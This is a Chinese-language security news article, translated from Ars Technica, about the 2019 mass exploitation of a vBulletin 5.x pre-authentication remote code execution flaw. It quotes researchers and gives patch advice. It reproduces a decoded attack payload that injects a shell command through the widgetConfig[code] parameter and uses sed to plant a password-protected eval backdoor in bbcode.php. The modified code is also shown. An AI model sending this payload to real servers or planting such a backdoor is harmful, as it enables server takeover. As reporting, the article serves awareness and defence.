据悉，网络攻击者正在大规模利用由一个匿名者所披露的漏洞，它可让vBulletin服务器被非法接管。vBulletin是互联网上最流行的网站评论应用之一，而现在它正遭受严重的安全威胁，所有vBulletin服务器管理员应尽快安装好vBulletin开发者于周三上午发布的补丁。

周一，一位匿名人士发布了一份18行漏洞利用脚本，相当于正式对外披露这一漏洞。该漏洞可让未经身份验证的攻击者对版本5.0.0到5.5.4版本的vBulletin服务器远程执行恶意代码。目前来看，该漏利用方式简单，以至于一些批评人士将其描述为后门。

Tenable公司的研究人员Ryan Seguin表示：“这看起来就像超级简单的命令注入。攻击者发送payload，vBulletin就会运行命令，命令执行权限和vBulletin本身权限相同。

据Bad Packets security的研究员Troy Mursch的说法，攻击者正在使用僵尸网络大范围攻击脆弱服务器。在解码攻击请求后，内容如下：

widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;

以上payload涉及更改以下路径的代码：

includes/vb5/frontend/controller/bbcode.php

原始代码看起来如下所示：

function evalCode($code)
{
    ob_start();
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

在发送攻击请求后，代码会变成：

function evalCode($code)
{
    ob_start();
    if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); }
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

Mursch表示，上述payload通过sed命令修改includes/vb5/frontend/controller/bbcode.php文件的内容，向文件添加后门，其中后门密码为2dmfrb28nu3c6s9j。因此，在后续的请求中，只有参数epass等于2dmfrb28nu3c6s9j，才会执行恶意代码，这就方便攻击者将其他漏洞利用者排除在外，以此构造大型僵尸网络。因其易用性，这个漏洞也被一些人视为后门。

已有一些vBulletin用户于本周三在vBulletin的官方支持页面上报告自己的网站已被攻击。其中一位用户表示在今天收到了一封来自服务器提供商的邮件，表示在网站上发现了恶意代码，而且服务器还发送了大量的垃圾邮件。另一个用户则报告说他的整个MySQL数据库被删除了。

虽然vBulletin是使用较为广泛的网站评论系统，但幸运的是，根据W3techs(一家互联网调查公司)的数据，5x版本占活跃的vBulletin服务器总数不到7%。尽管如此，根据网络上搜索的数据，超过10000个vBulletin网站可能都存在漏洞。

已被利用多年

据Zerodium exploit broker创始人兼首席执行官Chaouki Bekrar的说法，多年来，这一漏洞一直在暗中流传。

The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020\. Easy to spot and exploit.

Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years

— Chaouki Bekrar (@cBekrar) September 25, 2019

他在推特上写道:“多年来，许多研究人员一直在兜售这个漏洞。Zerodium的客户从3年前就意识到了这一点。”

另一个公开发布的利用脚本通过Shodan来查找存在漏洞的服务器，这扩大了漏洞的攻击范围。攻击者可以轻易生成vBulletin站点列表，然后逐一攻击。

该漏洞在默认设置下就可被任何未经身份验证的攻击者利用，而整个攻击流程只需要一个特殊的HTTP POST请求。所有未安装开发人员在周三上午发布的安全补丁的网站都不应该上线。著名网站Defcon就曾突然下线，几个小时后再次上线。网站创始人Jeff Moss表示，关闭网站正是为了避免被黑客攻击。

“我们立即对网站进行了测试，检查了日志之类的东西，没有发现试图攻击我们的流量。不过在我们重新上线后，立刻就发现了攻击流量。”

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场：https://nosec.org/home/detail/2993.html
来源：https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/